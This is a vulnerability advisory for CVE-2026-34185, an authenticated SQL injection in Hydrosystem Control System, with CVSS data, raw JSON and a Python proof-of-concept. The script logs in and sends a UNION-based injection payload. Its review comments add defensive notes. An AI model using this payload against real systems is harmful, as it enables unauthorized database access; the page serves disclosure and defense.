Security Vulnerability Report
CVE-2026-34185 CVSS 8.8 HIGH

CVE-2026-34185

Published: 2026-04-09 10:16:22
Last Modified: 2026-04-20 17:05:52

Description

Hydrosystem Control System is vulnerable to SQL Injection across most scripts and input parameters. Because no protections are in place, an authenticated attacker can inject arbitrary SQL commands, potentially gaining full control over the database. This issue was fixed in Hydrosystem Control System version 9.8.5.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hydrosystem.poznan:control_system:*:*:*:*:*:*:*:* - VULNERABLE
Hydrosystem Control System < 9.8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# NOTE(review): generic illustration of CVE-2026-34185 (CWE-89). The advisory
# on this page describes injection "across most scripts and input parameters"
# and names no specific script or parameter, so the host, both paths and the
# `id` parameter below appear to be placeholders, not product details.
#
# For defenders: per the advisory the issue is fixed in version 9.8.5, and the
# affected range is everything below it. The durable fix for this bug class is
# parameterised queries rather than input filtering. A request like the one
# built here is visible in web/application logs as SQL keywords (UNION,
# SELECT, a trailing comment marker) inside a query-string value sent by an
# already authenticated, low-privilege session.

# Target URL configuration (placeholder host and paths)
target_url = "http://target-hydrosystem/vulnerable_endpoint"
login_url = "http://target-hydrosystem/login"

# Low-privilege account: the CVSS vector on this page is PR:L, i.e. the flaw
# is reachable only after login. Sample values, sent over plain http here.
credentials = {
    "username": "low_priv_user",
    "password": "password123",
}

# One session object so the login cookie is reused by the second request.
http = requests.Session()

try:
    # Step 1: authenticate.
    print("[*] Attempting to login...")
    auth_reply = http.post(login_url, data=credentials)

    # Only the status code is inspected; a login form that answers 200 with an
    # error page would pass this check.
    if auth_reply.status_code != 200:
        print("[-] Login failed")
        exit()
    print("[+] Login successful")

    # Step 2: send a request whose parameter value carries SQL syntax.
    # The value closes a string literal and appends a UNION query asking for
    # the database version; it only has an effect if the server concatenates
    # the parameter into a statement instead of binding it.
    payload = "1' UNION ALL SELECT NULL, version(), NULL-- -"
    query = {"id": payload}  # placeholder parameter name

    print(f"[*] Sending payload: {payload}")
    reply = http.get(target_url, params=query)

    # Step 3: look at the answer.
    if reply.status_code != 200:
        print("[-] Exploit request failed")
    else:
        print("[+] Request sent successfully.")
        # NOTE(review): a keyword match on the body is a weak signal in both
        # directions, so neither branch proves the flaw present or absent.
        # Confirm exposure from the installed version instead (below 9.8.5 is
        # affected per the advisory).
        body = reply.text.lower()
        if any(marker in body for marker in ("mysql", "postgres")):
            print("[+] Potential SQL Injection confirmed based on response.")
        else:
            print("[!] Response received, verify output manually.")

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34185", "sourceIdentifier": "[email protected]", "published": "2026-04-09T10:16:22.260", "lastModified": "2026-04-20T17:05:51.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hydrosystem Control System is vulnerable to SQL Injection across most scripts and input parameters. Because no protections are in place, an authenticated attacker can inject arbitrary SQL commands, potentially gaining full control over the database.This issue was fixed in Hydrosystem Control System version 9.8.5"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hydrosystem.poznan:control_system:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.8.5", "matchCriteriaId": "C9D6B388-FD5C-486B-9493-E99D5499652D"}]}]}], "references": [{"url": "https://cert.pl/posts/2026/04/CVE-2026-4901/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.hydrosystem.poznan.pl/", "source": "[email protected]", "tags": ["Product"]}]}}